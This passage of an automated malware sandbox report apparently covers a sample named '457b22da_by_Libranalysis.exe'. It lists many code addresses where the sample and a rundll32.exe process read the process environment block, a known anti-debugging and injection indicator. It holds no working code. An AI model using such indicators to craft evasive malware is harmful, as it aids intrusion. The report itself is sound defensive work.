Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]	4_2_0194002D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]	4_2_0194002D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]	4_2_0194002D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]	4_2_0194002D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01930050 mov eax, dword ptr fs:[00000030h]	4_2_01930050
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01930050 mov eax, dword ptr fs:[00000030h]	4_2_01930050
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AC450 mov eax, dword ptr fs:[00000030h]	4_2_019AC450
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AC450 mov eax, dword ptr fs:[00000030h]	4_2_019AC450
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194A44B mov eax, dword ptr fs:[00000030h]	4_2_0194A44B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E1074 mov eax, dword ptr fs:[00000030h]	4_2_019E1074
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D2073 mov eax, dword ptr fs:[00000030h]	4_2_019D2073
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193746D mov eax, dword ptr fs:[00000030h]	4_2_0193746D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942397 mov eax, dword ptr fs:[00000030h]	4_2_01942397
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194B390 mov eax, dword ptr fs:[00000030h]	4_2_0194B390
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01928794 mov eax, dword ptr fs:[00000030h]	4_2_01928794
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]	4_2_01997794
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]	4_2_01997794
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]	4_2_01997794
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D138A mov eax, dword ptr fs:[00000030h]	4_2_019D138A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019CD380 mov ecx, dword ptr fs:[00000030h]	4_2_019CD380
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01921B8F mov eax, dword ptr fs:[00000030h]	4_2_01921B8F
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01921B8F mov eax, dword ptr fs:[00000030h]	4_2_01921B8F
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]	4_2_01944BAD
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]	4_2_01944BAD
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]	4_2_01944BAD
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E5BA5 mov eax, dword ptr fs:[00000030h]	4_2_019E5BA5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019953CA mov eax, dword ptr fs:[00000030h]	4_2_019953CA
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019953CA mov eax, dword ptr fs:[00000030h]	4_2_019953CA
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019537F5 mov eax, dword ptr fs:[00000030h]	4_2_019537F5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]	4_2_019403E2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]	4_2_019403E2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]	4_2_019403E2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]	4_2_019403E2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]	4_2_019403E2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]	4_2_019403E2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193F716 mov eax, dword ptr fs:[00000030h]	4_2_0193F716
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019D131B mov eax, dword ptr fs:[00000030h]	4_2_019D131B
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AFF10 mov eax, dword ptr fs:[00000030h]	4_2_019AFF10
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AFF10 mov eax, dword ptr fs:[00000030h]	4_2_019AFF10
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E070D mov eax, dword ptr fs:[00000030h]	4_2_019E070D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E070D mov eax, dword ptr fs:[00000030h]	4_2_019E070D
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194A70E mov eax, dword ptr fs:[00000030h]	4_2_0194A70E
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194A70E mov eax, dword ptr fs:[00000030h]	4_2_0194A70E
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194E730 mov eax, dword ptr fs:[00000030h]	4_2_0194E730
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01914F2E mov eax, dword ptr fs:[00000030h]	4_2_01914F2E
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01914F2E mov eax, dword ptr fs:[00000030h]	4_2_01914F2E
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E8B58 mov eax, dword ptr fs:[00000030h]	4_2_019E8B58
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191F358 mov eax, dword ptr fs:[00000030h]	4_2_0191F358
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191DB40 mov eax, dword ptr fs:[00000030h]	4_2_0191DB40
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192EF40 mov eax, dword ptr fs:[00000030h]	4_2_0192EF40
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01943B7A mov eax, dword ptr fs:[00000030h]	4_2_01943B7A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01943B7A mov eax, dword ptr fs:[00000030h]	4_2_01943B7A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191DB60 mov ecx, dword ptr fs:[00000030h]	4_2_0191DB60
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192FF60 mov eax, dword ptr fs:[00000030h]	4_2_0192FF60
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E8F6A mov eax, dword ptr fs:[00000030h]	4_2_019E8F6A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194D294 mov eax, dword ptr fs:[00000030h]	4_2_0194D294
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194D294 mov eax, dword ptr fs:[00000030h]	4_2_0194D294
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019AFE87 mov eax, dword ptr fs:[00000030h]	4_2_019AFE87
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192AAB0 mov eax, dword ptr fs:[00000030h]	4_2_0192AAB0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192AAB0 mov eax, dword ptr fs:[00000030h]	4_2_0192AAB0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194FAB0 mov eax, dword ptr fs:[00000030h]	4_2_0194FAB0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]	4_2_019152A5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]	4_2_019152A5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]	4_2_019152A5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]	4_2_019152A5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]	4_2_019152A5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]	4_2_019E0EA5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]	4_2_019E0EA5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]	4_2_019E0EA5
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019946A7 mov eax, dword ptr fs:[00000030h]	4_2_019946A7
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E8ED6 mov eax, dword ptr fs:[00000030h]	4_2_019E8ED6
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01958EC7 mov eax, dword ptr fs:[00000030h]	4_2_01958EC7
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019436CC mov eax, dword ptr fs:[00000030h]	4_2_019436CC
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019CFEC0 mov eax, dword ptr fs:[00000030h]	4_2_019CFEC0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942ACB mov eax, dword ptr fs:[00000030h]	4_2_01942ACB
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019276E2 mov eax, dword ptr fs:[00000030h]	4_2_019276E2
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01942AE4 mov eax, dword ptr fs:[00000030h]	4_2_01942AE4
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019416E0 mov ecx, dword ptr fs:[00000030h]	4_2_019416E0
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191AA16 mov eax, dword ptr fs:[00000030h]	4_2_0191AA16
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191AA16 mov eax, dword ptr fs:[00000030h]	4_2_0191AA16
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194A61C mov eax, dword ptr fs:[00000030h]	4_2_0194A61C
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0194A61C mov eax, dword ptr fs:[00000030h]	4_2_0194A61C
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01933A1C mov eax, dword ptr fs:[00000030h]	4_2_01933A1C
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]	4_2_0191C600
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]	4_2_0191C600
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]	4_2_0191C600
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01948E00 mov eax, dword ptr fs:[00000030h]	4_2_01948E00
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01928A0A mov eax, dword ptr fs:[00000030h]	4_2_01928A0A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019CFE3F mov eax, dword ptr fs:[00000030h]	4_2_019CFE3F
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0191E620 mov eax, dword ptr fs:[00000030h]	4_2_0191E620
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01954A2C mov eax, dword ptr fs:[00000030h]	4_2_01954A2C
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01954A2C mov eax, dword ptr fs:[00000030h]	4_2_01954A2C
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019A4257 mov eax, dword ptr fs:[00000030h]	4_2_019A4257
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]	4_2_01919240
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]	4_2_01919240
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]	4_2_01919240
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]	4_2_01919240
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]	4_2_01927E41
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]	4_2_01927E41
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]	4_2_01927E41
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]	4_2_01927E41
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]	4_2_01927E41
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]	4_2_01927E41
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]	4_2_0193AE73
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]	4_2_0193AE73
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]	4_2_0193AE73
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]	4_2_0193AE73
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]	4_2_0193AE73
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0195927A mov eax, dword ptr fs:[00000030h]	4_2_0195927A
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019CB260 mov eax, dword ptr fs:[00000030h]	4_2_019CB260
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019CB260 mov eax, dword ptr fs:[00000030h]	4_2_019CB260
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_019E8A62 mov eax, dword ptr fs:[00000030h]	4_2_019E8A62
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe	Code function: 4_2_0192766D mov eax, dword ptr fs:[00000030h]	4_2_0192766D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495849B mov eax, dword ptr fs:[00000030h]	9_2_0495849B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04949080 mov eax, dword ptr fs:[00000030h]	9_2_04949080
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C3884 mov eax, dword ptr fs:[00000030h]	9_2_049C3884
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C3884 mov eax, dword ptr fs:[00000030h]	9_2_049C3884
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0497F0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497F0BF mov eax, dword ptr fs:[00000030h]	9_2_0497F0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497F0BF mov eax, dword ptr fs:[00000030h]	9_2_0497F0BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049890AF mov eax, dword ptr fs:[00000030h]	9_2_049890AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]	9_2_049720A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]	9_2_049720A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]	9_2_049720A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]	9_2_049720A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]	9_2_049720A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]	9_2_049720A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]	9_2_049DB8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DB8D0 mov ecx, dword ptr fs:[00000030h]	9_2_049DB8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]	9_2_049DB8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]	9_2_049DB8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]	9_2_049DB8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]	9_2_049DB8D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A014FB mov eax, dword ptr fs:[00000030h]	9_2_04A014FB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]	9_2_049C6CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]	9_2_049C6CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6CF0 mov eax, dword ptr fs:[00000030h]	9_2_049C6CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A18CD6 mov eax, dword ptr fs:[00000030h]	9_2_04A18CD6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049458EC mov eax, dword ptr fs:[00000030h]	9_2_049458EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]	9_2_049C7016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]	9_2_049C7016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C7016 mov eax, dword ptr fs:[00000030h]	9_2_049C7016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]	9_2_049C6C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]	9_2_049C6C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]	9_2_049C6C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C6C0A mov eax, dword ptr fs:[00000030h]	9_2_049C6C0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A01C06 mov eax, dword ptr fs:[00000030h]	9_2_04A01C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]	9_2_04A1740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]	9_2_04A1740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A1740D mov eax, dword ptr fs:[00000030h]	9_2_04A1740D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A14015 mov eax, dword ptr fs:[00000030h]	9_2_04A14015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A14015 mov eax, dword ptr fs:[00000030h]	9_2_04A14015
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]	9_2_0497002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]	9_2_0497002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]	9_2_0497002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]	9_2_0497002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497002D mov eax, dword ptr fs:[00000030h]	9_2_0497002D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497BC2C mov eax, dword ptr fs:[00000030h]	9_2_0497BC2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]	9_2_0495B02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]	9_2_0495B02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]	9_2_0495B02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0495B02A mov eax, dword ptr fs:[00000030h]	9_2_0495B02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04960050 mov eax, dword ptr fs:[00000030h]	9_2_04960050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04960050 mov eax, dword ptr fs:[00000030h]	9_2_04960050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DC450 mov eax, dword ptr fs:[00000030h]	9_2_049DC450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049DC450 mov eax, dword ptr fs:[00000030h]	9_2_049DC450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A02073 mov eax, dword ptr fs:[00000030h]	9_2_04A02073
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A11074 mov eax, dword ptr fs:[00000030h]	9_2_04A11074
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497A44B mov eax, dword ptr fs:[00000030h]	9_2_0497A44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496746D mov eax, dword ptr fs:[00000030h]	9_2_0496746D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972990 mov eax, dword ptr fs:[00000030h]	9_2_04972990
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497FD9B mov eax, dword ptr fs:[00000030h]	9_2_0497FD9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497FD9B mov eax, dword ptr fs:[00000030h]	9_2_0497FD9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A105AC mov eax, dword ptr fs:[00000030h]	9_2_04A105AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04A105AC mov eax, dword ptr fs:[00000030h]	9_2_04A105AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0497A185 mov eax, dword ptr fs:[00000030h]	9_2_0497A185
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0496C182 mov eax, dword ptr fs:[00000030h]	9_2_0496C182
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]	9_2_04972581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]	9_2_04972581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]	9_2_04972581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04972581 mov eax, dword ptr fs:[00000030h]	9_2_04972581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]	9_2_04942D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]	9_2_04942D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]	9_2_04942D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]	9_2_04942D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04942D8A mov eax, dword ptr fs:[00000030h]	9_2_04942D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]	9_2_04971DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]	9_2_04971DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_04971DB5 mov eax, dword ptr fs:[00000030h]	9_2_04971DB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]	9_2_049C51BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_049C51BE mov eax, dword ptr fs:[00000030h]	9_2_049C51BE
